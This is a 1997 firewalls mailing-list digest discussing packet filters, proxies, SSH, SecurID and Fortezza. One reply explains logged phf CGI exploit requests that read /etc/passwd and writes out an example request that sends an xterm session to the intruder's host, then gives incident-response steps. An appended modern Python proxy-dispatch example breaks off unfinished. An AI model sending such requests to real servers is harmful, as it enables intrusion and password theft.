A properly configured (Internet) firewall comprises a proxy server protected from the Internet by a packet filter. The better the packet filter (state-based or extended filter), the less work the proxy server has to do as far as inspecting/denying traffic. The packet filter can also protect the proxy server from misc. IP-based attacks.

Good applications for packet filter/State-based firewalls are low-security internet feeds and fast low-latency intranet (10/100/155MB/...) security filtering. Not everyone needs a full application proxy firewall, a subject that comes up when I visit Mom-and-Pop small businesses that want a single feed for their 10 PCs.

IMHO - State-based firewalls are 'only' packet filters, and for the corporate environment should not replace the traditional proxy server, but work in conjunction with one.
_____________________________________________________________________________
Bill Stout (Systems Engineer/Consultant)            stoutb@pios.com
Pioneer Standard (Computer Systems & Components)    http://www.pios.com/
San Jose, CA (Location of 1 of 52 U.S. offices)     (408) 954-9100
*My opinions do not reflect that of the company, and vice-versa, thankfully.*

From owner-firewalls-outgoing Wed Jun 4 23:49:13 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA29553 for firewalls-outgoing; Wed, 4 Jun 1997 11:29:27 -0700 (PDT)
Received: from newman (newman.unifiedtech.com [38.251.136.48]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA29466 for ; Wed, 4 Jun 1997 11:29:09 -0700 (PDT)
Received: from bass by newman (SMI-8.6/SMI-SVR4) id OAA11400; Wed, 4 Jun 1997 14:30:46 -0400
Message-ID: <3395B45F.7853A99F@unifiedtech.com>
Date: Wed, 04 Jun 1997 14:30:55 -0400
From: Mike Jones
Organization: Unified Technologies, Inc.
X-Mailer: Mozilla 4.0b5C (X11; I; SunOS 5.5.1 sun4m)
MIME-Version: 1.0
To: Pedro Salgueiro
CC: "'Mike Jones'" , "'firewalls'"
Subject: Re: PIX and Firewall-1
X-Priority: 3 (Normal)
References: <01BC70CA.41A88880@pcpedro>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Pedro Salgueiro wrote:
> I've been "watching" the discussion regarding the differences between packet-filtering and application level firewalls. I believe that there are some:
> 1 - Packet filtering firewalls are more difficult to manage (It is very simple to mis-configure => less secure).
> It may be very complicated establishing rules.

I would dispute this, at least as regards FireWall-1. My experience and all the reviews I've seen agree that it's very easy to manage.
Now it's certainly the case that something that's easy to configure is easy to MISconfigure, but I don't think there's a firewall in the world that can make up for an admin who doesn't know what he's doing.

> 2 - Packet filter systems are always routing packets (so "fail-open" may occur). A well known constructor firewall crashed with a ping attack and routed all the packets from the insecure network to the secure one.

I'd be *very* interested in knowing whose firewall that was. I also don't think this is necessarily the case. For example, FireWall-1 (which is the firewall I'm most familiar with) works on Solaris by installing a kernel module which is in the path that IP packets go through. I have a hard time seeing how it could "fail open" in that configuration, though I'd admit that it's theoretically possible.

> 3 - If you are using a packet filter system and you provide SMTP, HTTP, etc. you cannot control what the users do with those protocols, i.e., you open or close a port. Application level firewalls provide secure daemons of those protocols.

This is an advantage of application level firewalls. However, there are reasons other than security (caching and spam filtering, for example) to have proxies in place, and I actually prefer an architecture where the security functions, whether proxy or filter based, are separated from the non-security functions.

> Regards,
> ----------
> From: Mike Jones
> Peter Carlson writes....
> > There are many comparisons made by datacomm, lan times, ziff-davis and
> > others. Keep in mind that both pix and fw-1 are glorified packet filters,
> > even though they have a fancy name for it. I would stick with an
> > application level gateway. They are well accepted and known for being more
> > secure.
>
> Many things are known that aren't so. This claim comes by periodically
> in this forum, and I have yet to get an answer to this question: in
> what way are application level gateways more secure than, say, FW-1 or PIX?
> There are certainly capabilities that can be provided via application
> proxies that can't be provided by any filter-based technologies, but what
> types of attacks are a FW-1 or a PIX vulnerable to that application
> proxies aren't?

--
Mike Jones
Sr. Technology Advisor
UNIFIED Technologies

From owner-firewalls-outgoing Thu Jun 5 00:02:19 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA13664 for firewalls-outgoing; Wed, 4 Jun 1997 12:49:25 -0700 (PDT)
Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA13419 for ; Wed, 4 Jun 1997 12:48:25 -0700 (PDT)
Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id MAA24034 for ; Wed, 4 Jun 1997 12:25:22 -0700 (PDT)
Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id OAA20829; Wed, 4 Jun 1997 14:16:46 -0500
Received: from dns1srv.bridge.com(167.76.36.6) by gatekeeper.Bridge.COM via smap (V1.3) id sma020824; Wed Jun 4 14:16:45 1997
Received: from binki.bridge.com (binki.bridge.com [167.76.24.243]) by dns1srv.bridge.com (8.7.6/8.7.3) with ESMTP id OAA17893; Wed, 4 Jun 1997 14:20:48 -0500 (CDT)
Received: (from ken@localhost) by binki.bridge.com (8.7/8.7) id OAA09104; Wed, 4 Jun 1997 14:21:18 -0500 (CDT)
Date: Wed, 4 Jun 1997 14:21:18 -0500 (CDT)
From: Ken Hardy
Message-Id: <199706041921.OAA09104@binki.bridge.com>
To: jdelgado@nexus.net.mx
Subject: Re: Secure Telnet!
Cc: firewalls@greatcircle.com
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

There used to be an alpha-level 16-bit encrypting telnet in the SSLeay archives. I don't know if it's still there or if it's been worked on at all. It's compatible with SSL, not SSH, of course.
http://www.psy.uq.oz.au/~ftp/Crypto

--
KH

From owner-firewalls-outgoing Thu Jun 5 00:09:20 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA06341 for firewalls-outgoing; Wed, 4 Jun 1997 12:06:32 -0700 (PDT)
Received: from mail.pfsfhq.com ([199.250.186.134]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id MAA06260 for ; Wed, 4 Jun 1997 12:06:10 -0700 (PDT)
Received: from neteng02 ([199.250.186.189]) by mail.pfsfhq.com (8.6.12/8.6.9) with SMTP id TAA25098 for ; Wed, 4 Jun 1997 19:15:17 -0400
Message-Id: <199706042315.TAA25098@mail.pfsfhq.com>
X-Mailer: Calypso Version 2.10.18
Date: Wed, 04 Jun 1997 15:09:19 -0400
From: "John Kemker"
To: firewalls@greatcircle.com
Subject: Re: ISP Connection
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Handing over your firewall administration to another organization is not, in my personal opinion, a wise move. You are saying, in effect, that you implicitly trust that organization to always think and act in your organization's best interest. This is not realistic.

"Only those defenses are good, certain and durable, which depend on yourself alone and your own ability."
_The_Prince_ --N. Machiavelli

Administer your firewall yourself. Put it up yourself, define the policies yourself and maintain it yourself.

=========== REPLY PARTITION ===========
On 06/04/97, at 12:01 PM, Mariko Yashada wrote:
>
>Here is a related question:
>
>There is another local ISP who will connect us at T1 and install a firewall
>at our location. They will then administer the firewall remotely from their
>location. They support three different firewalls, Gauntlet, Firewall-1 and
>Borderware. The advantage is the savings in admin costs. Has anyone had any
>experience with this type of arrangement? We have also talked to BBN about
>their Site Patrol product, which is a remotely managed Gauntlet.
>
>Thanks,
>
>Mariko
>

John E.
Kemker III
Systems Engineer, Primerica Financial Services
3120 Breckinridge Blvd., Duluth, GA 30199

From owner-firewalls-outgoing Thu Jun 5 00:19:10 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA06941 for firewalls-outgoing; Wed, 4 Jun 1997 12:10:27 -0700 (PDT)
Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA06852 for ; Wed, 4 Jun 1997 12:09:56 -0700 (PDT)
From: long-morrow@CS.YALE.EDU
Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id PAA17338; Wed, 4 Jun 1997 15:13:21 -0400 (EDT) sender long-morrow@CS.YALE.EDU for
Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id PAA02113; Wed, 4 Jun 1997 15:13:18 -0400 (EDT)
Date: Wed, 4 Jun 1997 15:13:18 -0400 (EDT)
Message-Id: <199706041913.PAA02113@SPARKY.CF.CS.YALE.EDU>
To: Firewalls@GreatCircle.COM, swnuck@unixpros.com
Subject: Re: getting passwd file via WWW
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

From: Stan Wnuck
>I have noticed on my WWW log files the following 2 entries.
>
>some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140
>some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143

Bad news. You've had your /etc/passwd file grabbed on Apr 28th. Someone has most assuredly tried running Crack on it by now and they are not restricted from just running 'cat' or 'ypcat'.

The second attempt was not successful as you didn't have a CGI program called php.cgi in your Web server's cgi-bin directory. But the first was.

The fact that both requests came in so quickly (back to back within two seconds!)
suggests that someone was running an automated tool which was scanning Web servers for vulnerabilities and logging successes (and probably squirrelling the ill-gotten passwd files away somewhere). Someone was almost certainly not typing in manually the URL to exploit your server via phf & php.

>Does anyone know anything about these cgi scripts or programs?

Yes. Everyone has known about the phf bug for over a year now (check out the CIAC and CERT announcements on it). The php.cgi program (which is not as widely distributed) is also a well-known vulnerability.

>Or how dangerous this is?

Very. If you have a standard Unix /etc/passwd file with readable password hashes (ie. you don't have a 'shadow' password file) then Crack can be run on the text of the password file. If any of your users had a weak password (the same as their username, a proper name, something easily guessed from their GECOS field, a dictionary word or a common alphabetic or numeric sequence, etc.) then the remote cracker can likely telnet or ftp into your Web server as the user with their password.

In fact, once they have determined that they can get phf to execute a command on your Web server they are not restricted to just 'cat'ting files readable by the userid the Web server is running as. They can also run any remote commands available to users on your machine (presuming you are not running your httpd chroot()d and it sounds like you are not). I.e. some.remote.location.edu could have run (if you have X installed):

"GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0A/usr/bin/X11/xterm%20-display%20some.remote.location.edu:0 HTTP/1.0"

This will often pop up an X Windows xterm terminal window on the intruder's display running as the userid the Web server (httpd) is running as. In some cases you will find that you need to change /usr/bin/X11 to /usr/openwin/bin or wherever the vendor has placed the xterm program.
Then the system cracker is running an interactive session on your machine without having to even crack any user passwords.

In any case, once a system cracker has a foothold (a regular user account on your system) they can then consult the BugTraq archive web site (www.geek-girl.com/bugtraq) and pick one of several root exploit scripts to use to obtain maximum privilege (my faves currently are the fdformat, Sony monitor calibration setuid utilities and ps commands for Solaris 2.5.1). Usually a cracker can have 'root' access on a vanilla Unix OS Web server within an hour using a regular user account with no privileges.

>.............................................., since I am not sure what
>my next move would be.

1. 'rm cgi-bin/phf' (wherever your web server is).
2. Take the machine off the network.
3. Copy the /etc/passwd file to a tape or floppy disk.
4. Disable all user accounts (my preference). Change the root password.
5. Back up the entire system to tape.
6. While the backup is running, run Crack (v5) on the old password file.
7. Check out all of the home directories belonging to users whose passwords you are able to crack.
8. Run COPS (an internal Unix audit tool) on the server machine.
9. Connect the machine to a standalone test LAN.
10. From a separate test machine run Satan and/or ISS (external TCP/IP network security audit tools which are aware of common Unix server vulnerabilities) against the machine.
11. Check the machine against the latest CERT (www.cert.org), CIAC (ciac.llnl.gov), BugTraq (www.geek-girl.com/bugtraq/) security vulnerability advisories to see which patches you haven't installed.
12. Bring down the machine.
13. Write up a report including the web server log, any logs from 'last', IP accounting from your router if it is turned on, etc. Summarize the results of your auditing with the Crack, COPS and Satan or ISS tools. Write up recommendations for securing the vulnerabilities found.
Send a copy of your security incident report to CERT, Postmaster@some.remote.location.edu, and any other relevant body (ie. if your site is military-related there will be a different agency than CERT to which you should report incidents).
14. FORMAT the machine, make NEW filesystem partitions, RE-INSTALL the OS using the latest vendor distribution CDROM.
15. Make sure that you install all of the latest vendor security patches, that you implement all of the suggestions and fix all of the holes that you found were in your configuration by running COPS and Satan/ISS. Apply any fixes recommended in CIAC, CERT, BugTraq and vendor alerts.
16. Audit your new system by retesting using COPS and Satan/ISS.
17. Carefully restore any critical software or user files/directories (only after first inspecting them for setuid/setgid, world-writable and .rhosts/.shosts files). For example you'll want to restore your Web server files, but carefully inspect any CGI programs for Trojans.
18. Remove any CGI programs which came with your Web server but you do not use (which would be most of them -- ie. phf, test-cgi, nph-test-cgi, etc.). Remove any CGI programs which you have written in a command language or 'shell'.
19. Make users pick a new 'strong' password and re-authenticate themselves to get their account re-enabled. Install a /bin/passwd replacement which screens out obvious and weak passwords.
20. Install Tripwire on the web server machine, checksum the system and other relevant files and periodically re-scan with Tripwire, COPS, Crack and Satan/ISS. Look at WebStalker and other programs which can analyze your Web server log files.

Consider installing a firewall or at least a screening router in between your Web server and the Internet.

- H.
Morrow Long

From owner-firewalls-outgoing Thu Jun 5 00:24:46 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA06614 for firewalls-outgoing; Wed, 4 Jun 1997 12:08:04 -0700 (PDT)
Received: from relay1.shore.net (relay1.shore.net [192.233.85.129]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA06538 for ; Wed, 4 Jun 1997 12:07:35 -0700 (PDT)
Received: from [198.115.179.81] (vin.shore.net [198.115.179.81]) by relay1.shore.net (8.8.3/8.8.3) with ESMTP id PAA05666; Wed, 4 Jun 1997 15:11:07 -0400 (EDT)
Message-Id:
In-Reply-To:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Wed, 4 Jun 1997 15:13:26 -0500
To: firewalls@greatcircle.com
From: Vin McLellan
Subject: RE: SecureID, CryptoCard, etc...
Cc: joav.kohn@us.landisstaefa.com, Richard.Forno@mail.house.gov, ddrumm@rush.edu
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

With the CEO at Landis & Staefa "gone security crazy" and demanding two-factor authentication (presumably to maintain accountability & audit trails) for employees online, Joav Kohn applied to the List seeking advice and counsel.

>>> anybody using keycard authentication to authenticate users in a
>>> winNT/win95 environment?
>>> my CEO has gone security crazy and would like to implement keycard
>>> authentication across the entire organization. so far, the vendors
>>> haven't been much help with advice on how to get win95 to authenticate
>>> with the cards. any information would be greatly appreciated.
>>> (p.s.. this is for LAN/WAN access, not dial-in)

(There was, I'm sad to note, a distinct lack of sympathy for Mr. Kohn's quandary among the List cognoscenti. That rascal Ranum, among others, razzed him for his boss' naivete in seeking security for Win95 systems, and our veteran network managers online were uncharacteristically silent. Probably green with jealousy that Mr.
Kohn has a CEO with _both_ interest and budget for network security -- the winning combo, but reportedly rare.)

Richard Forno helpfully reported:
>SecurID has a NT/95 workstation client for one-pass authentication.

Not quite. WinNT, yes. Win95, no.

Two-factor authentication -- ACE/SecurID, for example -- typically secures local protected memory, the local network connection, and remote network-based resources. In the NT LAN/WAN universe, this typically requires an ID authentication before a user is allowed direct-logon at his local NT workstation or server; and/or access to selected and protected intranet-based resources (including restricted portions of a public website); and/or connection to the NT Remote Access Service (RAS) or the Internet.

On a Win95 machine, ACE/SecurID authentication validates a user's identity before allowing him or her access to the LAN or WAN -- but offers no protection for local information resources on the PC. (If you need local file protection, consider a robust file or disk encryptor. SDTI has one in RSA SecurPC, but there are plenty of others, YEO and the like.)

Typically, the authentication server sits on its own Unix or NT machine, and each protected resource -- workstation, server, firewall, RDBS or other network resource -- has its own ACE/Agent (what SDTI used to call an ACE/Client.)

Daniel G. Drumm asked why Mr. Kohn specified the LAN/WAN environment in his query:
>>Why would the environment have much to do with it? FW1 or TIS Gauntlet
>>come with support for Secure/ID, you can have your employees get these
>>cards, and authenticate against the Firewall. You can then set a
>>user-by-user policy as to what they are allowed access to, and how long
>>they can access it for.

(Most of the leading firewalls do have ACE/Agent code integrated into them, but the user -- coming into the net at the firewall or elsewhere -- is really authenticating against an ACE/Server, typically on its own host.)
ACE/SecurID access can be restricted for groups of users -- as well as individuals -- and those individuals or groups can be limited to specific access paths into a network (i.e., by ACE/Agents, which can be located in a dial-in comm server, the firewall, etc.), as well as by day and hour-of-day. (All SecurIDs -- and, of course, any static passwords issued for temporary emergency access -- also always have a lifespan determined and specified by the local ACE Administrator.)

One reason the dial-in/WAN distinction might be important is that different environments have different risks associated with them. There is not enough info here to discuss options for L&S, but Mr. Kohn will have to consider the value of the information being handled online and his LAN and WAN threat environments, in order to make a meaningful decision about whether he needs to supplement authentication with full or session encryption.

Strong authentication (without network or app-based encryption) potentially leaves a user's session open to session hijacking -- where an active sniffer is used to splice into a user's then-current TCP session (after the user has been authenticated) to physically take over a user's session, with all that user's privileges on the Net.

Different threat environments can also make a difference in the choice of token model, at least with SecurID. The classic SecurID is popular with users for its ease of use; user simply prepends a PIN to the 30/60 second "tokencode" from his SecurID (great with encryption; sufficient in most other environments.) PinPad SecurID wraps the PIN in the pseudo-random token-code, protecting it more in high-threat environments. A SoftID program secures the PIN like a PINpad card, but since it is PC-resident software, it's open to different threats, despite encrypted storage and the standard protection mechanisms.
Actually, many security pros seem to feel that the token, per se, has become less important as IS organizations look ahead to the emerging need for encryption key-management and all that public-key crypto offers: digital signatures, message and software integrity checks -- as well as message confidentiality and potentially-strong user authentication. I've been preaching this myself for a few years.

We are all, today, about to get a good measure of the demand for these enhanced security functions as our users react to the s/mime-enabled web browsers from Netscape and Microsoft. If, as many expect, that demand is explosive -- maybe now is the time to look ahead to a corporate public-key infrastructure (PKI). Authentication -- even strong token-based user authentication -- may not be enough. Public-key crypto without a token to off-load the key will excite many, but it's a half-way measure and inevitably vulnerable without a two-factor hand-held base.

In short, many more network administrators may find their CEOs "gone security crazy"... and woe be unto him who buys now without looking ahead;-) Authentication is a hassle for users, however vital for auditors, but trinkets like digital sigs intrigue users. Demand is very different when it comes from the bottom up, as well as from the top down. (And PC-resident "private keys" used for digital signatures would be a _painful_ and corrupt compromise.)

SDTI (for which I have done consulting for many years) last year bought RSA Data Security and now offers a coherent strategic vision for how their ACE/SecurID customers can -- in the immediate future -- migrate from strong two-factor authentication to a full public-key crypto environment. SDTI sees their ACE/Server evolving from today's authentication server into a PKI-crypto key and certificate manager. Each user's PKC "private keys" will be stored in hand-held smartcards, or -- for a transition -- maybe in "soft smartcards," activated by a token-code & PIN.
Other vendors will be offering different strategic visions. Investigating those options ought to be on the agenda, at L&S as elsewhere. PKI is coming -- ready or not!

Suerte,
_Vin

Vin McLellan + The Privacy Guild +
53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548
-- <@><@> --

From owner-firewalls-outgoing Thu Jun 5 02:00:39 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id BAA11893 for firewalls-outgoing; Thu, 5 Jun 1997 01:12:36 -0700 (PDT)
Received: from cbu.pvtnet.cz (cbu.pvtnet.cz [194.149.105.18]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id BAA11858 for ; Thu, 5 Jun 1997 01:12:24 -0700 (PDT)
Received: from snajdr.pvt.net (snajdr.pvt.net [194.149.103.204]) by cbu.pvtnet.cz (8.8.5/8.7.3) with SMTP id KAA27365; Thu, 5 Jun 1997 10:21:20 +0200 (MET DST)
Message-ID: <33967557.62C80DFD@pvt.net>
Date: Thu, 05 Jun 1997 10:14:15 +0200
From: Petr Snajdr
X-Mailer: Mozilla 3.01 (X11; I; Linux 2.0.30 i586)
MIME-Version: 1.0
To: Vin McLellan , firewalls@GreatCircle.COM
Subject: Re: Secure Telnet!
References: <33956E4A.6590018C@pvt.net>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Free ssh client for M$ Windoze from Cedomir Igaly
See: ftp://hotline.pvt.net/pub/win_utils/winsock/ssh/

16-bit version : ssh97126.zip
32-bit version : ssh32.zip
crypto library for 16-bit version : crypl200.zip
crypto library for 32-bit version : crypl110.zip
patch for 32 bit crypto library (DES problem) : patch01.zip

There are 2 snapshots:
ftp://hotline.pvt.net/pub/win_utils/winsock/ssh/ssh.gif
ftp://hotline.pvt.net/pub/win_utils/winsock/ssh/ssh2.gif

--
Regards
Petr Snajdr

From owner-firewalls-outgoing Thu Jun 5 02:46:03 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA25602 for firewalls-outgoing; Wed, 4 Jun 1997 16:49:24 -0700 (PDT)
Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id QAA25342 for ; Wed, 4 Jun 1997 16:48:25 -0700 (PDT)
Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id QAA27280 for ; Wed, 4 Jun 1997 16:25:05 -0700 (PDT)
Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0wZPO5-0004FdC (Debian Smail-3.2 1996-Jul-4 #2); Thu, 5 Jun 1997 01:22:41 +0200 (MET DST)
Received: from lina.inka.de (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Thu, 5 Jun 97 01:22 MET DST
Received: by lina.inka.de id m0wZP9A-00014MC (Debian Smail-3.2 1996-Jul-4 #2); Thu, 5 Jun 1997 01:07:16 +0200 (CEST)
Message-Id:
Date: Thu, 5 Jun 1997 01:07:14 +0200
From: Bernd Eckenfels
To: Anton J Aylward
Cc: "Mark Horn [ Net Ops ]" , Firewalls@GreatCircle.COM
Subject: Re: Plug-gw- One to many relationship
References: <3.0.32.19970604114909.00952700@the-wire.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.67
In-Reply-To: <3.0.32.19970604114909.00952700@the-wire.com>; from Anton J Aylward on Wed, Jun 04, 1997 at 11:49:24AM -0400
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

> No, no, no, what *I* want and what about 10^7 other sites want is this...
>
> client A                W                 server C
>             firewall                      server D
> client B                                  server F
>                                           server G
>                                           server H
>                                           server I
>                                           server K

there are 2 Solutions (if we are talking about WWW)

a) use different Ports
   W:80   -> C:80
   W:8080 -> D:80
   W:8081 -> E:80

b) use the Host Command from HTTP which no browser nor Server does Support yet :)

To get back on it, it's not a problem of software, but of design. There is no way a Server can tell what the host part of a URL was other than looking at the connected address:port Combination. If you have only one valid address you can run only one server at a given port.

Greetings
Bernd

--
  (OO)      -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de --
 ( .. )  ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/
  o--o     *plush*  2048/93600EFD  eckes@irc  +4972573817  BE5-RIPE
(O____O)       If privacy is outlawed only Outlaws have privacy

From owner-firewalls-outgoing Thu Jun 5 02:46:26 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA27268 for firewalls-outgoing; Wed, 4 Jun 1997 13:58:00 -0700 (PDT)
Received: from relay1.shore.net ([192.233.85.129]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA18207 for ; Wed, 4 Jun 1997 13:11:13 -0700 (PDT)
Received: from [198.115.179.81] (vin.shore.net [198.115.179.81]) by relay1.shore.net (8.8.3/8.8.3) with ESMTP id QAA18326 for ; Wed, 4 Jun 1997 16:14:20 -0400 (EDT)
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Wed, 4 Jun 1997 16:13:10 -0500
To: firewalls@greatcircle.com
From: Vin McLellan
Subject: Fortezza's Fate??
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Anyone out there watching Fortezza's Doom unfold?

Fortezza was the US DoD's crypto (PCMCIA only?)
smartcard, part of the Capstone family introduced back with the original Clipper proposal for non-classified DoD use and other US government applications -- and, for awhile, heavily promoted to the civilian US government agencies, as well as to industry. Fortezza has Skipjack symmetric crypto (160 bit keys, I think) as well as full public-key functionality, but it was designed to complement the Clipper policy, so I recall it tossed off a LEAF escrow copy of each session key to government-established secure "key warehouses" in DoD, Commerce, and Treasury, maybe among other agencies. I presume many of the prominent firewall vendors got involved, since for a time it looked like this was going to be the authentication device used by the US DoD, other federal government employees, and contractors accessing federal systems. Fortezza is -- was? -- also obviously a big deal for network and firewall administrators (and users) at many US government agencies. There are a lot of rumors buzzing around DC these days to the effect that NSA and the Joint Chiefs have tossed in the towel and will, within weeks, approve DoD purchases for non-Fortezza security systems, for both strong authentication, and (I presume) more standard PKI. I understand they have been briefing US.gov security staff and the contractors who have been working on Fortezza apps. I also understand that DoD is considering approving Fortezza in software applications?!? I'm seeking some perspective on what happened and why. I'm intrigued, but ill informed. (Please feel free to correct anything above.) Suerte, _Vin "Cryptography is like literacy in the Dark Ages. Infinitely potent, for good and ill... yet basically an intellectual construct, an idea, which by its nature will resist efforts to restrict it to bureaucrats and others who deem only themselves worthy of such Privilege." _ A thinking man's Creed for Crypto/ vbm. 
* Vin McLellan + The Privacy Guild + * 53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548 From owner-firewalls-outgoing Thu Jun 5 02:53:28 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA09193 for firewalls-outgoing; Wed, 4 Jun 1997 15:16:06 -0700 (PDT) Received: from kaiser.cip.physik.uni-muenchen.de (kaiser.cip.physik.uni-muenchen.de [141.84.136.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA09166 for ; Wed, 4 Jun 1997 15:15:57 -0700 (PDT) Received: from server.muc.de (dial020.ppp.lrz-muenchen.de [129.187.24.20]) by kaiser.cip.physik.uni-muenchen.de with ESMTP id AAA22101 (8.6.10/IDA-1.6); Thu, 5 Jun 1997 00:19:28 +0200 Received: from chi.muc.de (root@chi.muc.de [192.168.1.2]) by server.muc.de (8.7.5/8.7.3) with SMTP id AAA10195; Thu, 5 Jun 1997 00:01:32 +0200 Message-ID: <3395E581.22635C3A@physik.uni-muenchen.de> Date: Thu, 05 Jun 1997 00:00:33 +0200 From: Hans Aschauer X-Mailer: Mozilla 3.01Gold (X11; I; Linux 2.0.30 i586) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Transparent Proxies for Linux Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, I thought that the transparent proxy option in the linux kernel looks quite interesting, but up to now I only found a http- and a vdo-proxy at ftp://ftp.ris.fr/pub/linux/proxy (can anyone help my what a vdo-proxy is?) Do you know of other proxies which can be used in a transparent mode (with linux) and which are free? Are there perhaps patches for other proxy products? TIA, Hans. 
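The two options Bernd Eckenfels lists in his Plug-gw reply above (one listening port on W per server, or the HTTP Host header) side by side, as an added Python example that is not from the list or from plug-gw. The server names, ports and request texts are constructed assumptions; the point it adds is that the Host header is client-supplied, so a relay that dispatches on it must only honour an allowlist and must refuse ambiguous requests.

```python
# Added example, not from the original list post: a minimal dispatcher for
# the "one gateway W in front of many web servers" problem Bernd describes.
# It tries solution (b), the HTTP Host header, and falls back to solution
# (a), one listening port on W per server, for clients that send no Host
# header (as 1997-era browsers did not).
# All host names, ports and request texts below are constructed assumptions.

from typing import Dict, List, Optional, Tuple

Backend = Tuple[str, int]

# Solution (a): port-based dispatch, W:80 -> C, W:8080 -> D, W:8081 -> E.
PORT_MAP: Dict[int, Backend] = {
    80:   ("server-c.example.invalid", 80),
    8080: ("server-d.example.invalid", 80),
    8081: ("server-e.example.invalid", 80),
}

# Solution (b): name-based dispatch.  The Host header is client-supplied,
# so only exact allowlisted names are honoured; anything else is refused
# rather than routed to a "default" server.
HOST_MAP: Dict[str, Backend] = {
    "www-c.example.invalid": ("server-c.example.invalid", 80),
    "www-d.example.invalid": ("server-d.example.invalid", 80),
    "www-e.example.invalid": ("server-e.example.invalid", 80),
}


def host_headers(request: bytes) -> List[str]:
    """Return every Host header value in the request head, lowercased and
    with an explicit :port removed.  HTTP/1.0 requests usually yield []."""
    head = request.split(b"\r\n\r\n", 1)[0]
    values = []
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"host":
            host = value.strip().decode("ascii", "replace").lower()
            if host.count(":") == 1:                 # "name:port", not IPv6
                host = host.split(":", 1)[0]
            values.append(host)
    return values


def choose_backend(local_port: int, request: bytes) -> Optional[Backend]:
    """Pick the server for a connection that arrived on W:local_port.

    Returns None when the request cannot be attributed to exactly one
    allowlisted server; the relay should then close the connection."""
    hosts = host_headers(request)
    if len(hosts) > 1:
        return None                     # duplicated Host header: ambiguous, refuse
    if hosts:
        return HOST_MAP.get(hosts[0])   # unknown name -> None, no port fallback
    return PORT_MAP.get(local_port)     # no Host header: the port decides


# Constructed sample requests.
REQ_HTTP10 = b"GET /index.html HTTP/1.0\r\nUser-Agent: old-browser\r\n\r\n"
REQ_HTTP11 = b"GET / HTTP/1.1\r\nHost: WWW-D.example.invalid:80\r\n\r\n"
REQ_UNKNOWN = b"GET / HTTP/1.1\r\nHost: other.example.invalid\r\n\r\n"
REQ_DUPLICATE = (b"GET / HTTP/1.1\r\nHost: www-c.example.invalid\r\n"
                 b"Host: www-d.example.invalid\r\n\r\n")

if __name__ == "__main__":
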